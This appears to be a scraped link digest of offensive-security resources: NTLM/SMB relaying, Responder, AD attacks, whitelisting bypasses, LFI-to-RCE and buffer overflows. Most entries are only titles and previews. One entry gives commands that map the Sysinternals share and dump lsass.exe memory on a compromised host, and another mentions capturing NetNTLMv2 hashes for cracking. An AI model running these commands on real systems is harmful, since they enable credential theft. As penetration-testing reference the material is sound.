Effective NTLM / SMB Relaying
https://room362.com/post/2014/2014-05-21-effective-ntlm-slash-smb-relaying/
  
  https://room362.com/post/2014/2014-05-21-effective-ntlm-slash-smb-relaying/
Room362
  
  Effective NTLM / SMB Relaying · Rob 'mubix' Fuller
  SMB Relay has been around for a long while. I even have a post about using it along with LNK files here:
MS08-068 + MS10-046 = Fun until 2018
Here is the problem though. Most of the tools to exploit it either catch the authentication in NTLMv2/NTLMv1 (which…
  MS08-068 + MS10-046 = Fun until 2018
Here is the problem though. Most of the tools to exploit it either catch the authentication in NTLMv2/NTLMv1 (which…
Fun with LDAP, Kerberos (and MSRPC) in AD Environments 
https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments
  
  https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments
Speaker Deck
  
  Fun with LDAP, Kerberos (and MSRPC) in AD Environments
  Slides from my Track X Thotcon 2018 Workshop entitled: 
 
"Fun with LDAP, Kerberos (and MSRPC) in AD Environments"
 
If you want the embedded Gifs/Vide…
  "Fun with LDAP, Kerberos (and MSRPC) in AD Environments"
If you want the embedded Gifs/Vide…
Interesting vuln allows attacker to bypass auth for android phone by taking a Skype call ☎️ 🔓
https://youtu.be/EiEcwOfTFqI
  
  https://youtu.be/EiEcwOfTFqI
YouTube
  
  Skype Android Authentication Bypass
  Skype Android Authentication Bypass 
Florian Kunushevci
https://www.linkedin.com/in/floriankunushevci/
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-0622
  Florian Kunushevci
https://www.linkedin.com/in/floriankunushevci/
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-0622
Map #Sysinternals tools folder locally, run tools when required. Useful on a compromised remote machine to avoid tool clutter.
net use Z: \\http://live.sysinternals.com \tools\ "/user:"
dir Z:
Z:\procdump -accepteula -ma lsass.exe lsassdmp
  net use Z: \\http://live.sysinternals.com \tools\ "/user:"
dir Z:
Z:\procdump -accepteula -ma lsass.exe lsassdmp
Pwning with Responder – A Pentester’s Guide
https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/
  https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/
WMIC.EXE Whitelisting Bypass - Hacking with Style, Stylesheets 
https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html
  https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html
Mobile Application Penetration Testing Cheat Sheet
https://github.com/sh4hin/MobileApp-Pentest-Cheatsheet
  
  https://github.com/sh4hin/MobileApp-Pentest-Cheatsheet
GitHub
  
  GitHub - sh4hin/MobileApp-Pentest-Cheatsheet: The Mobile App Pentest cheat sheet was created to provide concise collection of high…
  The Mobile App Pentest cheat sheet was created to provide concise collection of high value information on specific mobile application penetration testing topics. - sh4hin/MobileApp-Pentest-Cheatsheet
  SMTP Log Poisioning through LFI to Remote Code Exceution
https://www.hackingarticles.in/smtp-log-poisioning-through-lfi-to-remote-code-exceution/
  
  https://www.hackingarticles.in/smtp-log-poisioning-through-lfi-to-remote-code-exceution/
Hacking Articles
  
  SMTP Log Poisoning through LFI to Remote Code Execution - Hacking Articles
  In this Post, we will be discussing on SMTP log poisoning. But before getting in details, kindly read our previous articles for “SMTP Lab Set-Up”
  Buffer Overflow Practical Examples , metasploit , gdb and objdump ! - protostar stack3
https://0xrick.github.io/binary-exploitation/bof3/
  
  https://0xrick.github.io/binary-exploitation/bof3/
0xRick's Blog
  
  Buffer Overflow Examples, Overwriting a function pointer - protostar stack3
  Another post where I overwrite a variable value which is used as a function pointer. (x32)
  BOVSTT – Buffer Overflow Vulnerability Services Tester Tool
https://hakin9.org/bovstt-buffer-overflow-vulnerability-services-tester-tool/
  https://hakin9.org/bovstt-buffer-overflow-vulnerability-services-tester-tool/
COM XSL Transformation: Bypassing Microsoft Application Control Solutions (CVE-2018-8492)
https://bohops.com/2019/01/10/com-xsl-transformation-bypassing-microsoft-application-control-solutions-cve-2018-8492/
  
  https://bohops.com/2019/01/10/com-xsl-transformation-bypassing-microsoft-application-control-solutions-cve-2018-8492/
bohops
  
  COM XSL Transformation: Bypassing Microsoft Application Control Solutions (CVE-2018-8492)
  Introduction Greetings, Everyone!  It has been several months since I’ve blogged, so it seems fitting to start the New Year off with a post about two topics that I thoroughly enjoy exploring: …
  Some CNA scripts with great ideas like Invoke-CredLeak to get the NETNTLMv2 hash for a user when on a machine for cracking.
https://github.com/vysecurity/Aggressor-VYSEC
  
  https://github.com/vysecurity/Aggressor-VYSEC
GitHub
  
  GitHub - vysecurity/Aggressor-VYSEC
  Contribute to vysecurity/Aggressor-VYSEC development by creating an account on GitHub.
  